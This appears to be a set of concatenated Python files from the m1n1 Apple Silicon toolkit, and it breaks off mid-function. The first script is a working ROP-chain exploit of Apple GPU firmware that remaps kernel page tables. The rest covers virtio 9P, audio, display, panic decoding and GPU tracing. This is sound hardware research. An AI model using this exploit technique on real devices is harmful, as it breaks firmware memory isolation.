#!/usr/bin/env python3
# SPDX-License-Identifier: MIT

import sys, pathlib, time
sys.path.append(str(pathlib.Path(__file__).resolve().parents[1]))

import atexit, sys

from m1n1.agx import AGX
from m1n1.agx.render import *
from m1n1.fw.agx.microsequence import *
from construct import *

from m1n1.setup import *
from m1n1 import asm

p.pmgr_adt_clocks_enable("/arm-io/gfx-asc")
p.pmgr_adt_clocks_enable("/arm-io/sgx")

agx = AGX(u)
agx.mon = mon
sgx = agx.sgx_dev

def magic(renderer, work, ms):
    work.scratch = agx.kobj.new_buf(0x4000, name="scratch", track=True)

    # dump GXF area
    #for i in range(0, 0x200, 8):
        #ms.append(Read64Cmd(0xffffff8000068000 + i))
        #ms.append(Store64Cmd(work.scratch._addr + i))
    #return

    gbl_cur_cmd_state = 0xffffff80000744b0

    v_gptbat_base = 0xffffff800004d06b
    v_kpt_pfn = 0xffffff80000680b0

    g_epilogue = 0xffffff8000021ec0

    sp = 0xffffff80000baab0 + 0x1c0
    v_lr = sp + 0x58
    v_x26 = sp + 0x10
    v_x23 = sp + 0x28
    v_x22 = sp + 0x30
    v_x21 = sp + 0x38

    g_stack_pivot = 0xffffff8000006640
    #0xffffff8000006640 : mov sp, x2 ; movz x0, #0x1 ; ret

    g_calltwo = 0xffffff8000045e24
    # 0xffffff8000045e24 :
    # ldr x8, [x22] ; ldr x8, [x8] ; mov x0, x22 ; movz w1, #0x5 ; mov x2, x23 ; mov x3, #0x0 ; blr x8 ;
    g_callone = 0xffffff8000045e3c
    # ldr x8, [x21, #0x70] ; cbz x8, #0xffffff8000045e4c ; mov x0, x26 ; blr x8
    # mov x0, x23 ;
    # ldp x29, x30, [sp, #0x80] ;
    # ldp x20, x19, [sp, #0x70] ;
    # ldp x22, x21, [sp, #0x60] ;
    # ldp x24, x23, [sp, #0x50] ;
    # ldp x26, x25, [sp, #0x40] ;
    # ldp x28, x27, [sp, #0x30] ;
    # ldp d9, d8, [sp, #0x20] ;
    # add sp, sp, #0x90 ; ret

    g_store = 0xffffff800003b310
    # 0xffffff800003b310 : str x0, [x23, #0xa78] ; ldp x29, x30, [sp, #0x40] ; ldp x20, x19, [sp, #0x30] ; ldp x22, x21, [sp, #0x20] ; ldp x24, x23, [sp, #0x10] ; ldp x26, x25, [sp], #0x50 ; ret

    g_mmu_gxf_enter = 0xffffff8000006650

    ROP_SIZE = 0x400

    rbuf = agx.kobj.new(Array(ROP_SIZE, Int64ul), name="ROP", track=True)
    p_rop = rbuf._addr

    rop = []

    def r(i):
        p = p_rop + len(rop) * 8
        rop.append(i)
        return p

    def e(v):
        p = p_rop + len(rop) * 8
        rop.extend(v)
        return p

    tmp_cmdbuf = r(0)
    pg_stack_pivot = r(g_stack_pivot)
    ppg_stack_pivot = r(pg_stack_pivot)
    pg_store = r(g_store)
    pg_epilogue = r(g_epilogue)
    pg_mmu_gxf_enter = r(g_mmu_gxf_enter)

    v_ttbrs = 0xffffff8001000000
    v_ttbr1_63 = v_ttbrs + 63 * 16

    gxf_map_args = e([
        v_ttbrs >> 14, # va
        0,  # pa
        1,      # size
        0x41b,  # EL1 RW Shared
        0,      # unk
    ])

    gxf_map_op = e([
        0x10,   # map
        gxf_map_args
    ])

    gxf_switch_args = e([
        63 << 32,   # context ID
    ])

    gxf_switch_op = e([
        0x20,   # switch
        gxf_switch_args
    ])

    if len(rop) & 1:
        r(0)

    # Low leaf PT for firmware
    v_kpt0 = 0xffffff8001fc8000
    # New page tables (AGX heap scratch)
    # Actually make this the TTBR page lol
    v_new_pt = 0xffffff80000b4000

    new_sp = e([
        # Set the TTBR1 for context 63
        # Coming from g_calltwo
        0x0aaaaaaaaa000006,
        0x0aaaaaaaaa000007,
        0x0aaaaaaaaa000008,
        0x0aaaaaaaaa000009,
        0x0aaaaaaaaa00000a,
        0x0aaaaaaaaa00000b,
        0x0bbbbbbbbb000028, # x28
        0x0bbbbbbbbb000027, # x27
    ])
    new_ttbr = e([
        0x1bbbbbbbbb000026, # x26 = x0 = value
        0x1bbbbbbbbb000025, # x25
        0x1bbbbbbbbb000024, # x24
        v_ttbr1_63 - 0xa78, # x23 = addr
        0x1bbbbbbbbb000022, # x22
        pg_store - 0x70,    # x21 = func
        0x1bbbbbbbbb000020, # x20
        0x1bbbbbbbbb000019, # x19
        0x1bbbbbbbbb000029, # x29
        g_callone,          # lr

        # Switch to context 63
        # Coming from g_store
        gxf_switch_op,      # x26 = x0 = op
        0x2bbbbbbbbb000025, # x25
        0x2bbbbbbbbb000024, # x24
        0x2bbbbbbbbb000023, # x23
        0x2bbbbbbbbb000022, # x22
        pg_mmu_gxf_enter - 0x70, # x21 = func
        0x2bbbbbbbbb000020, # x20
        0x2bbbbbbbbb000019, # x19
        0x2bbbbbbbbb000029, # x29
        g_callone,          # lr

        # Install our page table in the kernel space
        # Coming from g_callone
        0x3aaaaaaaaa000006,
        0x3aaaaaaaaa000007,
        0x3aaaaaaaaa000008,
        0x3aaaaaaaaa000009,
        0x3aaaaaaaaa00000a,
        0xaaaaaaaaaa00000b,
        0x3bbbbbbbbb000028, # x28
        0x3bbbbbbbbb000027, # x27
    ])
    ktp_pte_val = e([
        0x3bbbbbbbbb000026, # x26 = x0 = value
        0x3bbbbbbbbb000025, # x25
        0x3bbbbbbbbb000024, # x24
    ])
    kpt_pte_addr = e([
        0x3bbbbbbbbb000023, # x23 = addr
        0x3bbbbbbbbb000022, # x22
        pg_store - 0x70,    # x21 = func
        0x3bbbbbbbbb000020, # x20
        0x3bbbbbbbbb000019, # x19
        0x3bbbbbbbbb000029, # x29
        g_callone,          # lr
    ])
    def restore_reg(p):
        return e([
            # Restore x21
            # Coming from g_store
            0x4bbbbbbbbb000026, # x26 = x0 = value
            0x4bbbbbbbbb000025, # x25
            0x4bbbbbbbbb000024, # x24
            p - 0xa78,          # x23 = addr
            0x4bbbbbbbbb000022, # x22
            pg_store - 0x70,    # x21 = function
            0x4bbbbbbbbb000020, # x20
            0x4bbbbbbbbb000019, # x19
            0x4bbbbbbbbb000029, # x29
            g_callone,          # lr
        ])

    save_x21 = restore_reg(v_x21)
    save_x22 = restore_reg(v_x22)
    save_x23 = restore_reg(v_x23)
    save_x26 = restore_reg(v_x26)
    save_lr = restore_reg(v_lr)

    e([
        # Return to original stack
        # Coming from g_store
        0,                  # x26 = r0 = ret
        0x5bbbbbbbbb000025, # x25
        0x5bbbbbbbbb000024, # x24
        sp,                 # x23 = new sp
        ppg_stack_pivot,    # x22 = 1st function
        pg_epilogue - 0x70, # x21 = 2nd function
        0x5bbbbbbbbb000020, # x20
        0x5bbbbbbbbb000019, # x19
        0x5bbbbbbbbb000029, # x29
        g_calltwo,          # lr
    ])
    print(f"ROP len: {len(rop)*8:#x}")

    rbuf.val = rop + [0] * (ROP_SIZE - len(rop))
    rbuf.push()

    # Calculate pfn of the ttbr base
    vpg_ttbrs = gxf_map_args + 8
    ms.append(Read64Cmd(v_gptbat_base))
    ms.append(ALUCmd(ALUCmd.LSR, 14))
    ms.append(Store64Cmd(vpg_ttbrs))

    # Calculate physaddr of the kpte to overwrite
    ms.append(Read64Cmd(v_kpt_pfn))
    ms.append(ALUCmd(ALUCmd.LSL, 14))
    ms.append(ALUCmd(ALUCmd.XOR, 0xffffffffffffffff))
    ms.append(Add16Cmd(0xa78 - 8 * 4))
    ms.append(ALUCmd(ALUCmd.XOR, 0xffffffffffffffff))
    ms.append(Store64Cmd(kpt_pte_addr))

    # Read the page tables to find the paddr of our new PT,
    # and generate the PTE and TTBR
    # pt[0] -> self reference L1 -> L2
    ms.append(Read64Cmd(v_kpt0 + ((v_new_pt >> 14) & 0x7ff) * 8))
    ms.append(ALUCmd(ALUCmd.AND, 0xfffffffc000))
    ms.append(ALUCmd(ALUCmd.OR, 1))
    ms.append(Store64Cmd(new_ttbr))
    ms.append(ALUCmd(ALUCmd.OR, 2))
    ms.append(Store64Cmd(ktp_pte_val))
    ms.append(Store64Cmd(v_new_pt))

    # Map physical 32M pages at 0, 32M, 8G-32, 16G-32
    # This should be enough to make the exploit work regardless of RAM size,
    # the shader can map the rest
    for page in (0, 1, 255, 511):
        # pt[0x400+x] -> 0x800000000 + (x<<25)
        ms.append(Write64Cmd(v_new_pt + 0x2000 + 8 * page, 0xe0000800000409 | (page<<25)))

    # Save the stack values we will clobber,
    # and construct the new ttbr0 PT
    for src, dest in (
        (v_lr, save_lr),
        (v_x21, save_x21),
        (v_x22, save_x22),
        (v_x23, save_x23),
        (v_x26, save_x26),
    ):
        ms.append(Read64Cmd(src))
        ms.append(Store64Cmd(dest))

    # Set up our initial ROP pivot (GXF map TTBRs)
    ms.append(Write64Cmd(v_x21, pg_mmu_gxf_enter - 0x70))
    ms.append(Write64Cmd(v_x22, ppg_stack_pivot))
    ms.append(Write64Cmd(v_x23, new_sp))
    ms.append(Write64Cmd(v_x26, gxf_map_op))
    ms.append(Write64Cmd(v_lr, g_calltwo))

    # Figure out the stamp addr/val to complete the current command
    ms.append(Read64Cmd(gbl_cur_cmd_state))
    ms.append(Add16Cmd(0x10))
    store_cmd_buf = Store64Cmd(0)
    ms.append(store_cmd_buf)

    store_cmd_buf.addr = ms.cur_addr() + Read64Cmd.offsetof("addr")
    ms.append(Read64Cmd(0))
    ms.append(ALUCmd(ALUCmd.AND, 0xffffffffffffffe0))
    ms.append(Store64Cmd(tmp_cmdbuf))

    off_3d_stamp_addr =  0x8d8
    off_3d_stamp_value =  0x8e0
    off_3d_stamp_index =  0x8e4

    off_ta_stamp_addr =  0x578
    off_ta_stamp_value =  0x580
    off_ta_stamp_index =  0x584

    ms.append(Add16Cmd(off_ta_stamp_addr))
    store = Store64Cmd(0)
    ms.append(store)
    store.addr = ms.cur_addr() + Read64Cmd.offsetof("addr")
    ms.append(Read64Cmd(0))
    store_stamp_addr = Store64Cmd(0)
    ms.append(store_stamp_addr)

    ms.append(Read64Cmd(tmp_cmdbuf))
    ms.append(Add16Cmd(off_ta_stamp_value))
    store = Store64Cmd(0)
    ms.append(store)
    store.addr = ms.cur_addr() + Read32Cmd.offsetof("addr")
    ms.append(Read32Cmd(0))
    store_stamp_val = Store64Cmd(0)
    ms.append(store_stamp_val)

    ms.append(DoorbellCmd(1))

    off = ms.cur_addr()
    store_stamp_addr.addr = off + CompleteCmd.offsetof("stamp_addr")
    store_stamp_val.addr = off + CompleteCmd.offsetof("stamp_val")
    cmd = CompleteCmd()
    cmd.stamp_addr = 0
    cmd.stamp_val = 0
    ms.append(cmd)

    #off = ms.cur_addr()
    #store_stamp_addr.addr = off + AbortCmd.offsetof("stamp_addr")
    #store_stamp_val.addr = off + AbortCmd.offsetof("stamp_val")
    #cmd = AbortCmd()
    #cmd.stamp_addr = 0
    #cmd.stamp_val = 0
    #ms.append(cmd)

    ms.append(Write64Cmd(0xdead, 0))

try:
    agx.start()
    #agx.uat.dump(0)

    print("==========================================")
    print("## After init")
    print("==========================================")
    mon.poll()
    agx.poll_objects()

    ctx = GPUContext(agx)
    ctx.bind(2)

    f = GPUFrame(ctx, sys.argv[1], track=False)

    r = GPURenderer(ctx, 8, bm_slot=0x10, queue=1)
    print("==========================================")
    print("## Submitting")
    print("==========================================")

    r.mshook_ta = magic

    w = r.submit(f.cmdbuf)

    print("==========================================")
    print("## Submitted")
    print("==========================================")

    mon.poll()
    agx.poll_objects()

    print("==========================================")
    print("## Run")
    print("==========================================")

    r.run()

    while not r.ev_ta.fired:
        agx.asc.work()
        agx.poll_channels()

    #r.wait()
    agx.poll_objects()

    print("==========================================")
    print("## Scratch")
    print("==========================================")
    #chexdump(w.scratch.pull().val)
    #print(hex(w.scratch.pull().val))
    #open("68000.dump", "wb").write(w.scratch.pull().val)

    time.sleep(1)
    agx.poll_channels()
    agx.kick_firmware()
    agx.asc.work()
    agx.asc.work()
    agx.poll_channels()
    #agx.asc.crash.crash_hard()
    #agx.poll_channels()
    time.sleep(1)
    agx.poll_channels()
    agx.asc.work()
    agx.asc.work()
    agx.poll_channels()

    w = r.submit(f.cmdbuf)
    r.run()
    time.sleep(1)
    agx.poll_channels()

finally:
    mon.poll()
    agx.poll_objects()
    agx.uat.invalidate_cache()
    print(repr(agx.uat.iotranslate(0, 0xffffff8001000000, 0x10)))
    #print("UAT dump:")
    #agx.uat.dump(0)
    #print(f"Val: {p.read64(0x810000000):#x}")
    p.reboot()



# SPDX-License-Identifier: MIT
from construct import Struct, Int8ul, Int16ul, Int32sl, Int32ul, Int64ul
from subprocess import Popen, PIPE
import pathlib
import struct
import os
import sys

from ..utils import *

VirtioConfig = Struct(
    "irq" / Int32sl,
    "devid" / Int32ul,
    "feats" / Int64ul,
    "num_qus" / Int32ul,
    "data" / Int64ul,
    "data_len" / Int64ul,
    "verbose" / Int8ul,
)

class VirtioDescFlags(Register16):
    WRITE = 1
    NEXT  = 0

VirtioDesc = Struct(
    "addr" / Int64ul,
    "len" / Int32ul,
    "flags" / RegAdapter(VirtioDescFlags),
    "next" / Int16ul,
)

VirtioExcInfo = Struct(
    "devbase" / Int64ul,
    "qu" / Int16ul,
    "idx" / Int16ul,
    "pad" / Int32ul, 
    "descbase" / Int64ul,
)

class VirtioDev:
    def __init__(self):
        self.base, self.hv = None, None # assigned by HV object

    def read_buf(self, desc):
        return self.hv.iface.readmem(desc.addr, desc.len)

    def read_desc(self, ctx, idx):
        off = VirtioDesc.sizeof() * idx
        return self.hv.iface.readstruct(ctx.descbase + off, VirtioDesc)

    @property
    def config_data(self):
        return b""

    @property
    def devid(self):
        return 0

    @property
    def num_qus(self):
        return 1

    @property
    def feats(self):
        return 0

class Virtio9PTransport(VirtioDev):
    def __init__(self, tag="m1n1", root=None):
        p_stdin, self.fin = os.pipe()
        self.fout, p_stdout = os.pipe()
        if root is None:
            root = str(pathlib.Path(__file__).resolve().parents[3])
        if type(tag) is str:
            self.tag = tag.encode("ascii")
        else:
            self.tag = tag
        self.p = Popen([
            "u9fs",
            "-a", "none", # no auth
            "-n", # not a network conn
            "-u", os.getlogin(), # single user
            root,
        ], stdin=p_stdin, stdout=p_stdout, stderr=sys.stderr)

    @property
    def config_data(self):
        return struct.pack("=H", len(self.tag)) + self.tag

    @property
    def devid(self):
        return 9

    @property
    def num_qus(self):
        return 1

    @property
    def feats(self):
        return 1

    def call(self, req):
        os.write(self.fin, req)
        resp = os.read(self.fout, 4)
        length = int.from_bytes(resp, byteorder="little")
        resp += os.read(self.fout, length - 4)
        return resp

    def handle_exc(self, ctx):
        head = self.read_desc(ctx, ctx.idx)
        assert not head.flags.WRITE

        req = bytearray()

        while not head.flags.WRITE:
            req += self.read_buf(head)

            if not head.flags.NEXT:
                break
            head = self.read_desc(ctx, head.next)

        resp = self.call(bytes(req))
        resplen = len(resp)

        while len(resp):
            self.hv.iface.writemem(head.addr, resp[:head.len])
            resp = resp[head.len:]
            if not head.flags.NEXT:
                break
            head = self.read_desc(ctx, head.next)

        self.hv.p.virtio_put_buffer(ctx.devbase, ctx.qu, ctx.idx, resplen)

        return True



#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
import sys, pathlib
sys.path.append(str(pathlib.Path(__file__).resolve().parents[1]))

import struct
from construct import *

from m1n1.setup import *
from m1n1.shell import run_shell
from m1n1.hw.dart import DART
from m1n1.fw.aop.client import AOPClient
from m1n1.fw.aop.ipc import *

# aop nodes have no clocks described in adt for j293. it does it itself
p.pmgr_adt_clocks_enable("/arm-io/aop")
p.pmgr_adt_clocks_enable("/arm-io/dart-aop")

p.usb_iodev_vuart_setup(p.iodev_whoami())
p.iodev_set_usage(IODEV.USB_VUART, USAGE.UARTPROXY)
pdm2 = u.adt["/arm-io/aop/iop-aop-nub/aop-audio/audio-pdm2"]
decm = u.adt["/arm-io/aop/iop-aop-nub/aop-audio/dc-2400000"]

dart = DART.from_adt(u, "/arm-io/dart-aop",
                     iova_range=(u.adt["/arm-io/dart-aop"].vm_base, 0x1000000000))
dart.initialize()

aop = AOPClient(u, "/arm-io/aop", dart)
aop.update_bootargs({
    'p0CE': 0x20000,
    'laCn': 0x0,
    'tPOA': 0x1,
    "gila": 0x80,
    'gbda': 0xffffffff,
})
aop.verbose = 4

p.dapf_init_all()
aop.asc.OUTBOX_CTRL.val = 0x20001 # (FIFOCNT=0x0, OVERFLOW=0, EMPTY=1, FULL=0, RPTR=0x0, WPTR=0x0, ENABLE=1)

pdm2 = u.adt["/arm-io/aop/iop-aop-nub/aop-audio/audio-pdm2"]
decm = u.adt["/arm-io/aop/iop-aop-nub/aop-audio/dc-2400000"]

pdm_config = Container(
    bytesPerSample=pdm2.bytesPerSample, # 2 ??
    clockSource=pdm2.clockSource, # 'pll '
    pdmFrequency=pdm2.pdmFrequency, # 2400000
    pdmcFrequency=pdm2.pdmcFrequency, # 24000000
    slowClockSpeed=pdm2.slowClockSpeed, # 24000000
    fastClockSpeed=pdm2.fastClockSpeed, # 24000000
    channelPolaritySelect=pdm2.channelPolaritySelect, # 256
    channelPhaseSelect=99, # traces say 99 but device tree says 0 pdm2.channelPhaseSelect
    unk8=0xf7600,
    unk9=0, # this should be latency (thus 15, see below) but traces say 0
    ratios=Container(
        r1=decm.ratios.r0,
        r2=decm.ratios.r1,
        r3=decm.ratios.r2,
    ),
    filterLengths=decm.filterLengths,
    coeff_bulk=120,
    coefficients=GreedyRange(Int32sl).parse(decm.coefficients),
    unk10=1,
    micTurnOnTimeMs=pdm2.micTurnOnTimeMs, # 20
    unk11=1,
    micSettleTimeMs=pdm2.micSettleTimeMs, # 50
)

decimator_config = Container(
    latency=decm.latency, # 15
    ratios=Container(
        r1=decm.ratios.r0, # 15
        r2=decm.ratios.r1, # 5
        r3=decm.ratios.r2, # 2
    ),
    filterLengths=decm.filterLengths,
    coeff_bulk=120,
    coefficients=GreedyRange(Int32sl).parse(decm.coefficients),
)

def main():
    aop.start()
    for epno in [0x20, 0x21, 0x22, 0x24, 0x25, 0x26, 0x27, 0x28]:
        aop.start_ep(epno)
    aop.work_for(0.3)
    audep = aop.audio
    vtep = aop.voicetrigger

    #ret = aop.spuapp.send_roundtrip("i2c", ALSSetPropertyUnkE4())
    #print(ret)

    audep.send_notify(AudioAttachDevice(devid='pdm0'))
    audep.send_notify(AudioAttachDevice(devid='hpai'))
    audep.send_notify(AudioAttachDevice(devid='lpai'))

    audep.send_notify(SetDeviceProp(devid='lpai', modifier=301, data=Container(unk1=7, unk2=7, unk3=1, unk4=7)))
    audep.send_notify(SetDeviceProp(devid='pdm0', modifier=200, data=pdm_config))
    audep.send_notify(SetDeviceProp(devid='pdm0', modifier=210, data=decimator_config))

    data = open("data/aop/dump.voicetrigger.2024-01-29T01:49:14.803544.bin", "rb").read()
    ret = vtep.send_cmd(0x22, data[:0xa000])
    for n in range(3):
        ret = vtep.send_roundtrip(GetPropertyIsReady())
        print("state: %s" % (ret.state)) # cnfg
        assert(ret.state == "cnfg")

    #ret = vtep.send_notifycmd(0x24, struct.pack("<I", 0)) # reset
    ret = vtep.send_cmd(0x23, struct.pack("<I", 0))
    for n in range(3):
        ret = vtep.send_roundtrip(GetPropertyIsReady())
        print("state: %s" % (ret.state)) # runn
        assert(ret.state == "runn")

    if 1:
        ret = audep.send_notify(AudioPropertyPower(devid='lai ',
            data=Container(
                devid='lai ',
                unk1=1,
                target_pstate='runn',
                unk2=0,
            )
        ))

    # TODO garbage from lpai mic. Not sure why
    if 1:
        ret = audep.send_notify(AudioPropertyPower(devid='lpai',
            data=Container(
                devid='lpai',
                unk1=2,
                target_pstate='runn',
                unk2=1,
            )
        ))

    aop.work_forever()

try:
    main()
    pass
except KeyboardInterrupt:
    pass

#run_shell(locals(), poll_func=aop.work)



#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
import sys, pathlib
sys.path.append(str(pathlib.Path(__file__).resolve().parents[1]))

import struct
from construct import *

from m1n1.setup import *
from m1n1.shell import run_shell
from m1n1 import asm
from m1n1.hw.dart import DART
from m1n1.fw.dcp.iboot import DCPIBootClient, SurfaceFormat, EOTF, Transform, AddrFormat, Colorspace
from m1n1.proxyutils import RegMonitor

print(f"Framebuffer at {u.ba.video.base:#x}")

p.display_shutdown(DCP_SHUTDOWN_MODE.QUIESCED)

dart = DART.from_adt(u, "arm-io/dart-dcp")
disp_dart = DART.from_adt(u, "arm-io/dart-disp0")
#disp_dart.dump_all()

dcp_addr = u.adt["arm-io/dcp"].get_reg(0)[0]
dcp = DCPIBootClient(u, dcp_addr, dart, disp_dart)
dcp.dva_offset = getattr(u.adt["/arm-io/dcp"][0], "asc_dram_mask", 0)

dcp.start()
dcp.start_ep(0x23)
dcp.start_ep(0x24)

dcp.iboot.wait_for("disp0")
dcp.dptx.wait_for("dcpav0")
dcp.dptx.wait_for("dcpdp0")

#dcp.dptx.dcpav0.setPower(False)
#dcp.dptx.dcpav0.forceHotPlugDetect()
#dcp.dptx.dcpav0.setVirtualDeviceMode(0)
#dcp.dptx.dcpav0.setPower(True)
#dcp.dptx.dcpav0.wakeDisplay()
#dcp.dptx.dcpav0.sleepDisplay()
#dcp.dptx.dcpav0.wakeDisplay()

print("Waiting for HPD...")
while True:
    hpd, ntim, ncolor = dcp.iboot.disp0.getModeCount()
    if hpd:
        break

print("HPD asserted")

print(f"Connected:{hpd} Timing modes:{ntim} Color modes:{ncolor}")
dcp.iboot.disp0.setPower(True)

timing_modes = dcp.iboot.disp0.getTimingModes()
print("Timing modes:")
print(timing_modes)

color_modes = dcp.iboot.disp0.getColorModes()
print("Color modes:")
print(color_modes)

timing_modes.sort(key=lambda c: (c.valid, c.width <= 1920, c.fps_int <= 60, c.width, c.height, c.fps_int, c.fps_frac))
timing_mode = timing_modes[-1]

color_modes.sort(key=lambda c: (c.valid, c.bpp <= 32, c.bpp, -int(c.colorimetry), -int(c.encoding), -int(c.eotf)))
color_mode = color_modes[-1]

print("Chosen timing mode:", timing_mode)
print("Chosen color mode:", color_mode)

dcp.iboot.disp0.setMode(timing_mode, color_mode)

w, h = timing_mode.width, timing_mode.height

layer = Container(
    planes = [
        Container(
            addr = 0x013ec000,
            stride = u.ba.video.stride,
            addr_format = AddrFormat.PLANAR,
        ),
        Container(),
        Container()
    ],
    plane_cnt = 1,
    width = u.ba.video.width,
    height = u.ba.video.height,
    surface_fmt = SurfaceFormat.w30r,
    colorspace = Colorspace.SCRGBFixed,
    eotf = EOTF.GAMMA_SDR,
    transform = Transform.NONE,
)

mw = min(w, u.ba.video.width)
mh = min(h, u.ba.video.height)

swap = dcp.iboot.disp0.swapBegin()
print(swap)
dcp.iboot.disp0.swapSetLayer(0, layer, (mw, mh, 0, 0), (mw, mh, 0, 0))
dcp.iboot.disp0.swapEnd()
#dcp.iboot.disp0.swapWait(swap.swap_id)

run_shell(globals(), msg="Have fun!")

# full shutdown!
dcp.stop(1)
p.pmgr_reset(0, "DISP0_CPU0")



# SPDX-License-Identifier: MIT
import re
from construct import *

__all__ = []

DebuggerState = Struct(
    "panic_options"             / Hex(Int64ul),
    "current_op"                / Hex(Int32ul),
    "proceed_on_sync_failure"   / Int32ul,
    "message"                   / Hex(Int64ul),
    "panic_str"                 / Hex(Int64ul),
    "panic_args"                / Hex(Int64ul),
    "panic_data_ptr"            / Hex(Int64ul),
    "panic_caller"              / Hex(Int64ul),
    "entry_count"               / Hex(Int32ul),
    "kern_return"               / Hex(Int32sl)
)

# Darwin va_list is just a stack pointer...
VaList = Struct(
    "stack" / Hex(Int64ul),
)

def decode_debugger_state(u, ctx):
    p = u.proxy
    iface = u.iface

    def hv_readmem(addr, size):
        addr = p.hv_translate(addr, False, False)
        assert addr != 0
        return iface.readmem(addr, size)

    p_state = p.hv_translate(ctx.regs[25], False, False)
    assert p_state != 0
    di = iface.readstruct(p_state, DebuggerState)
    print(di)

    message = hv_readmem(di.message, 1024).split(b"\x00")[0].decode("ascii")
    print()
    print(f"Message: {message}")

    print("===== Panic string =====")
    decode_panic(u, di.panic_str, di.panic_args)
    print("========================")

def decode_panic_call(u, ctx):
    decode_panic(u, ctx.regs[0], ctx.regs[1])

def decode_panic(u, p_string, p_args):
    p = u.proxy
    iface = u.iface

    def hv_readmem(addr, size):
        addr = p.hv_translate(addr, False, False)
        assert addr != 0
        return iface.readmem(addr, size)

    string = hv_readmem(p_string, 1024).split(b"\x00")[0].decode("ascii")
    p_args = p.hv_translate(p_args, False, False)

    args = iface.readstruct(p_args, VaList)

    stack = hv_readmem(args.stack, 504)

    def va_arg(t):
        nonlocal stack
        d, stack = stack[:8], stack[8:]
        return t.parse(d)

    utypes = {
        "hh": Int8ul,
        "h": Int16ul,
        None: Int32ul,
        "l": Int64ul,
        "ll": Int64ul,
        "q": Int64ul,
        "s": Int64ul,
        "t": Int64ul,
    }

    stypes = {
        "hh": Int8sl,
        "h": Int16sl,
        None: Int32sl,
        "l": Int64sl,
        "ll": Int64sl,
        "q": Int64sl,
        "s": Int64sl,
        "t": Int64sl,
    }

    #print(string)

    def format_arg(match):
        pat, flags, width, mod, conv = match.group(0, 1, 2, 3, 4)
        if conv == "%":
            return "%"
        elif conv == "s":
            return hv_readmem(va_arg(Int64ul), 1024).split(b"\x00")[0].decode("ascii")
        elif conv in "di":
            v = va_arg(stypes[mod])
            return f"%{flags or ''}{width or ''}{conv or ''}" % v
        elif conv in "ouxX":
            v = va_arg(utypes[mod])
            return f"%{flags or ''}{width or ''}{conv or ''}" % v
        elif conv in "p":
            return f"0x{va_arg(Int64ul):x}"
        else:
            return f"[{pat!r}:{va_arg(Int64ul):x}]"

    string = re.sub('%([-#0 +]*)([1-9][0-9]*)?(hh|h|l|ll|q|L|j|z|Z|t)?([diouxXeEfFgGaAcsCSpnm%])',
                    format_arg, string)
    print(string + "\n", end="")

__all__.extend(k for k, v in globals().items()
               if (callable(v) or isinstance(v, type)) and v.__module__ == __name__)



# SPDX-License-Identifier: MIT

import textwrap, os.path, json, datetime, ctypes, plistlib
from .asc import *
from ..hw.uat import UAT, MemoryAttr, PTE, Page_PTE, TTBR
from ..hw.agx import *

from ..fw.agx.initdata import InitData, InitData_RegionC
from ..fw.agx.channels import *
from ..fw.agx.cmdqueue import *
from ..fw.agx.microsequence import *
from ..fw.agx.handoff import *

from m1n1.proxyutils import RegMonitor
from m1n1.constructutils import *
from m1n1.trace import Tracer

from construct import *

class ChannelTraceState(object):
    pass

class CommandQueueState(object):
    pass

class GpuMsg(Register64):
    TYPE    = 55, 48

class PongMsg(GpuMsg):
    TYPE    = 59, 52
    UNK     = 47, 0

class PongEp(EP):
    # This endpoint receives pongs. The cpu code reads some status registers after receiving one
    # Might be a "work done" message.
    BASE_MESSAGE = GpuMsg

    @msg(0x42, DIR.RX, PongMsg)
    def pong_rx(self, msg):
        if self.tracer.state.active:
            self.log(f"  Pong {msg!s}")
        if msg.UNK != 0:
            self.log(f"  Pong had unexpected value{msg.UNK:x}")
            self.hv.run_shell()

        self.tracer.pong()
        return True

    @msg(0x81, DIR.TX, PongMsg)
    def init_ep(self, msg):
        self.log(f"  Init {msg.UNK:x}")

        self.tracer.pong_init(msg.UNK)
        return True

class KickMsg(GpuMsg):
    TYPE    = 59, 52
    KICK    = 7, 0 # Seen: 17, 16 (common), 9, 8, 1 (common), 0 (common)

class KickEp(EP):
    BASE_MESSAGE = GpuMsg

    @msg(0x83, DIR.TX, KickMsg)
    def kick(self, msg):
        if self.tracer.state.active:
            self.log(f"  Kick {msg}")
        self.tracer.kick(msg.KICK)

        return True

    @msg(0x84, DIR.TX, KickMsg)
    def fwkick(self, msg):
        if self.tracer.state.active:
            self.log(f"  FWRing Kick {msg}")
        self.tracer.fwkick(msg.KICK)
        return True

class ChannelTracer(Reloadable):
    STATE_FIELDS = ChannelStateFields
    WPTR = 0x20
    RPTR = 0x00

    def __init__(self, tracer, info, index):
        self.tracer = tracer
        self.uat = tracer.uat
        self.hv = tracer.hv
        self.u = self.hv.u
        self.ring_count = len(channelRings[index])
        self.verbose = False

        if index not in tracer.state.channels:
            self.state = ChannelTraceState()
            self.state.active = True
            self.state.tail = [0] * self.ring_count
            tracer.state.channels[index] = self.state
        else:
            self.state = tracer.state.channels[index]

        self.index = index
        self.name = channelNames[index]
        self.info = info
        base = None

        if self.name == "FWLog":
            base = self.tracer.state.fwlog_ring2

        self.channel = Channel(self.u, self.uat, self.info, channelRings[index], base=base,
                               state_fields=self.STATE_FIELDS)
        for i in range(self.ring_count):
            for addr, size in self.channel.rb_maps[i]:
                self.log(f"rb_map[{i}] {addr:#x} ({size:#x})")

        self.set_active(self.state.active)

    def state_read(self, evt, regmap=None, prefix=None, off=None):
        ring = off // 0x30
        off = off % 0x30

        msgcls, size, count = self.channel.ring_defs[ring]

        if off == self.WPTR:
            if self.verbose:
                self.log(f"RD [{evt.addr:#x}] WPTR[{ring}] = {evt.data:#x}")
            self.poll_ring(ring, evt.data)
        elif off == self.RPTR:
            if self.verbose:
                self.log(f"RD [{evt.addr:#x}] RPTR[{ring}] = {evt.data:#x}")
            self.poll_ring(ring)
        else:
            if self.verbose:
                self.log(f"RD [{evt.addr:#x}] UNK[{ring}] {off:#x} = {evt.data:#x}")

    def state_write(self, evt, regmap=None, prefix=None, off=None):
        ring = off // 0x30
        off = off % 0x30

        msgcls, size, count = self.channel.ring_defs[ring]

        if off == self.WPTR:
            if self.verbose:
                self.log(f"WR [{evt.addr:#x}] WPTR[{ring}] = {evt.data:#x}")
            self.poll_ring(ring, evt.data)
        elif off == self.RPTR:
            if self.verbose:
                self.log(f"WR [{evt.addr:#x}] RPTR[{ring}] = {evt.data:#x}")
            self.poll_ring(ring)
            # Clear message with test pattern
            idx = (evt.data - 1) % count
            self.channel.clear_message(ring, idx)
        else:
            if self.verbose:
                self.log(f"WR [{evt.addr:#x}] UNK[{ring}] {off:#x} = {evt.data:#x}")

    def log(self, msg):
